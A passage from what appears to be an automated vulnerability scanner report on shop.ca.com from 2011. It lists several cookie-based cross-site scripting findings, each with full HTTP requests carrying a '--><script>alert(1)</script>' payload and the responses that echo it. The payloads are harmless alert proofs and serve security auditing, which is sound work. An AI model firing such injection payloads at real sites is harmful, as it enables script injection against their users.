Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=131034922011041708544517319321424389285--><script>alert(1)</script>4c3b13506ed; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:42 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--SessionId :131034922011041708544517319321424389285--><script>alert(1)</script>4c3b13506ed-->
...[SNIP]...
4.301. http://shop.ca.com/applications/email/d_subscribe.asp [__utma cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utma cookie is copied into an HTML comment. The payload 85b45--><script>alert(1)</script>7b497413ae3 was submitted in the __utma cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.185b45--><script>alert(1)</script>7b497413ae3; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:49 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utma :36441954.679833155.1303044886.1303044886.1303044886.185b45--><script>alert(1)</script>7b497413ae3-->
...[SNIP]...
4.302. http://shop.ca.com/applications/email/d_subscribe.asp [__utmb cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utmb cookie is copied into an HTML comment. The payload 7b3db--><script>alert(1)</script>47a4f48e6e6 was submitted in the __utmb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.13030448867b3db--><script>alert(1)</script>47a4f48e6e6; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:51 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=A&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utmb :36441954.3.10.13030448867b3db--><script>alert(1)</script>47a4f48e6e6-->
...[SNIP]...
4.303. http://shop.ca.com/applications/email/d_subscribe.asp [__utmc cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utmc cookie is copied into an HTML comment. The payload 59e33--><script>alert(1)</script>09e1a43ff2c was submitted in the __utmc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=3644195459e33--><script>alert(1)</script>09e1a43ff2c; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Length: 9505
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:49 GMT
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utmc :3644195459e33--><script>alert(1)</script>09e1a43ff2c-->
...[SNIP]...
4.304. http://shop.ca.com/applications/email/d_subscribe.asp [__utmz cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the __utmz cookie is copied into an HTML comment. The payload 6bd45--><script>alert(1)</script>a403585bd9c was submitted in the __utmz cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)6bd45--><script>alert(1)</script>a403585bd9c; Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:43 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--__utmz(36441954.1303:(direct)|utmccn=(direct)|utmcmd=(none)6bd45--><script>alert(1)</script>a403585bd9c-->
...[SNIP]...
4.305. http://shop.ca.com/applications/email/d_subscribe.asp [_clogin cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /applications/email/d_subscribe.asp

Issue detail

The value of the _clogin cookie is copied into an HTML comment. The payload 3f4c2--><script>alert(1)</script>d1db291ccbd was submitted in the _clogin cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /applications/email/d_subscribe.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=13030469394523f4c2--><script>alert(1)</script>d1db291ccbd;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Content-Type: text/html
Cache-Control: private
Date: Sun, 17 Apr 2011 13:04:52 GMT
Content-Length: 9505
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: DB=msRandX=93&msProduct=1782427&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&Survey=1&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/


<html>
<head>

<TITLE>shop.ca.com - Invalid Email</TITLE>
<meta name="Author" content="TigerDirect, Inc. Web Development Team">
<meta name="copyright" content=". 2003 TigerDirect, Inc. All righ
...[SNIP]...
<!--_clogin(e) :13030469394523f4c2--><script>alert(1)</script>d1db291ccbd-->
...[SNIP]...
4.306. http://shop.ca.com/cgi-bin/ShoppingCart.asp [Cart cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the Cart cookie is copied into an HTML comment. The payload e871c--><script>alert(1)</script>9f31185eaa was submitted in the Cart cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=e871c--><script>alert(1)</script>9f31185eaa; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:58 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=e871c%2D%2D%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9f31185eaa&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15772

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--Cart(Referer) :e871c--><script>alert(1)</script>9f31185eaa-->
...[SNIP]...
4.307. http://shop.ca.com/cgi-bin/ShoppingCart.asp [CoreID6 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the CoreID6 cookie is copied into an HTML comment. The payload 6f146--><script>alert(1)</script>9726ccbd6e was submitted in the CoreID6 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=6f146--><script>alert(1)</script>9726ccbd6e; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:38 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:38 GMT
Content-Length: 16116
Connection: close
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Set-Cookie: Cart=PHPromo=N&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; path=/
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--CoreID6(818720507435:6f146--><script>alert(1)</script>9726ccbd6e-->
...[SNIP]...
4.308. http://shop.ca.com/cgi-bin/ShoppingCart.asp [DB cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload c3b06--><script>alert(1)</script>bf5167e6a07 was submitted in the DB cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp?msg= HTTP/1.1
Host: shop.ca.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Cart=Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp&Referer=; SessionId=1310349220110417085445173193214243; SRCCODE=CAWEB; beta=Y; SRVR=WEBX140%2D01C; DB=msRandX=93&msProduct=1782427&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpgc3b06--><script>alert(1)</script>bf5167e6a07; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.1.10.1303044886

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 12:58:58 GMT
Cache-Control: no-cache
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 12:58:58 GMT
Connection: close
Set-Cookie: Order=orderTotal=; path=/
Set-Cookie: SRCCODE=CAWEB; expires=Tue, 17-May-2011 04:00:00 GMT; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; path=/
Set-Cookie: SRVR=WEBX140%2D01C; path=/
Content-Length: 15773

<!-- -->


<html>
<title>
Your shop.ca.com Shopping Cart
</title>

<style>
.sm { font-face: Verdana; font-size: 8pt; }
td.vis {
visibility:visible
}
td.hid {
visibility:hidden
...[SNIP]...
<!--DB(msImageSC) :/microsoft/MSelasticity-bnr_620x150C.jpgc3b06--><script>alert(1)</script>bf5167e6a07-->
...[SNIP]...
4.309. http://shop.ca.com/cgi-bin/ShoppingCart.asp [IS3_GSV cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.ca.com
Path:   /cgi-bin/ShoppingCart.asp

Issue detail

The value of the IS3_GSV cookie is copied into an HTML comment. The payload 375b3--><script>alert(1)</script>f7d3ee7a31 was submitted in the IS3_GSV cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cgi-bin/ShoppingCart.asp HTTP/1.1
Host: shop.ca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SessionId=1310349220110417085445173193214243; __utmz=36441954.1303044886.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Order=orderTotal=; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150C%2Ejpg&Survey=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150C%2Ejpg&msProduct=1782427&msRandX=93; Cart=PHPromo=N&Referer=&Landing=http%3A%2F%2Fshop%2Eca%2Ecom%2Fca%2Fresources%2Fresources%2Easp; CoreID6=81872050743513030451330&ci=; beta=Y; SRCCODE=CAWEB; SRVR=WEBX140%2D01C; IS3_History=1301114230-2-91_0--2__0_0; IS3_GSV=DPL-2_TES-1303045130_PCT-1303045130_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com375b3--><script>alert(1)</script>f7d3ee7a31; __utma=36441954.679833155.1303044886.1303044886.1303044886.1; __utmc=36441954; __utmb=36441954.3.10.1303044886; _clogin=l=1303045133&v=7&e=1303046939452;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-SV: MIAWEB01C
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private
Content-Type: text/html
Expires: Sat, 16 Apr 2011 13:04:38 GMT
Cache-Control: no-cache
Date: Sun, 17 Apr 2011 13:04:39 GMT
Content-Length: 16116
Connection: close
